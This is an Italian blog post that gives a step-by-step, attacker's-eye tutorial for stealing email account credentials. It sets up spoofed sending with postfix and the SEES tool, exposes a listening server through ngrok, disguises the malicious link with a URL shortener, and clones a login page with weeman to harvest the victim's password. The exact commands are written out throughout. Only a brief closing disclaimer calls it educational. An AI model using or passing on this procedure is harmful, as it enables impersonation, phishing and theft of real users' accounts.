Come sottrarre un occount Email | Linuxiano.it
Privacy Policy

Come sottrarre un occount Email

Come sottrarre-occount-email

Al giorno d’ oggi chiunque possiede un indirizzo Email si sarà visto recapitare almeno una volta dei messaggi di posta strani il cui mittente, in apparenza legittimo, risulta ad un esame più approfondito contraffatto

Ci troviamo di fronte ad un caso di Email spoofing una tecnica che fonda le proprie radici nell’ ingegneria sociale usata da spammer e Hacker per indurre l’ utente ad aprire link malevoli o scaricare file che fungono da payload.

Cammufandosi come un potenziale attacante vi mostrerò un applicazione concreta

Vestendo i panni di un potenziale attacante, vedremo qui un’ applicazione concreta di tale tecnica, finalizzata alla sottrazione di credenziali di un dato account.
Prima di tutto mettiamo la nostra macchina all’ invio Email con indirizzo e nome dominio modificati, in modo da poter impersonare quasivoglia mittente; tuttavia, è importante notare che l’ IP pubblico sarà comunque rintracciabile negli header della mail.
A questo scopo il progetto SEES (Social Engineering Email Service) rappresenta un ottimo punto di riferimento.
Utilizzando una distro Linux come Kali o anche Ubuntu installiamo i pacchetti necessari per il suo corretto funzionamento.

Terminale
  • sudo apt install mailutils
  • sudo apt install postfix

Cvonfiguriamo il servizio postfix selezionando nella finestra “impostazioni” la voce Internet Site, quindi specificando il nome di domino che vogliamo mostrare alla vittima quando aprirà la nostra mail contrafatta.

Avviamo il nuovo servizio di sistema lanciando il comando:

Terminale
  • sudo /etc/init.d/postfix start

A questo punto procuriamoci SEES:

Terminale
  • git clone https://github.com/galkan/sees.git

e andiamo a modificare i due file di configurazione che troviamo nel percorso sees/config:

  • mail.user
  • sees.cfg

Occorre specificare qui l’indirizzo mail fasullo e il nome dell’ attacante, oltre all’oggetto e all’ indirizzo mail della vittima.
Ricordiamoci di inserire lo stesso dominio indicato nella fase di configurazione di postfix.

Costruire una mail fasulla

Al percorso sees/data prepariamo invece il contenuto della mail da recapitare attraverso i tag HTML: i dettagli e la veste grafica risulteranno determinanti per la buona riuscita del’ attacco, cerchiamo dunque di essere il più possibile accurati.
Non rimane che predisporre il link malevolo che si desidera far aprire alla vittima, che sarà quello che permatterà di intercettare in seguito le sue credenziali; prima però è necessario preparare un web server in ascolto. Per renderlo operativo anche al di fuori della LAN ci avvarremo di ngrok, un servizio in grado di esporre ada internet un qualsiasi web server senza il bisogno di creare reole di port forwarding nel gateway. Procuriamoci l’ eseguibile per sistemi su base Linuxf all’ indirizzo https://ngrok.com/download.
Da un nuovo terminale scriviamo ngrok e collochiamo l’ URL generato all’ interno del codice HTML della mail. Per renderlo ancora più credibile, è possibile abbreviarlo o personalizzarlo con un url-shortener.

Terminale

Sudo ./ngrok http 8080

Infine, inviamo la mail alla vittima con l’ istruzione:

Terminale

python sees.py –text –config_file config/sees.cfg –mail_user config/mail.user –html_file data/html.text -v

Per l’ ultimo step ci serviremo di weeman, un semplice ma efficace tool scritto in python utilizzato per le azioni di phishing. Cloniamo il progetto ed eseguiamo il programma impostando i seguenti parametri:

Terminale
git clone https://github.com/samyoyo/weeman.git
./weeman.py
set url http://www.SITOINTERCETTARE.com
set port 8080
set action_url LINKGENERATODANGROK
run

Ecco ciò vedrà la vittima una volta aperto il link malevolo dalla nostra mail.
Una volta effettuato il login, l’ output ci restituirà le credenziali inserite dalla vittima sulla finta pagina Web creata con il comando iniziale. Ribadiamo ancora che lo spoofing è severamente punibile dalla legge.

PS. Solo ad uso personale

Queste procedure chiamate spoofing che vi ho illustrato nel’ articolo sono solo per uso dadattico cosi da sapere come si muovono i pirati informatici. Sarete pronti a respingere eventuali attacchi. Ogni utilizzo improprio costituisce un reato attenzione!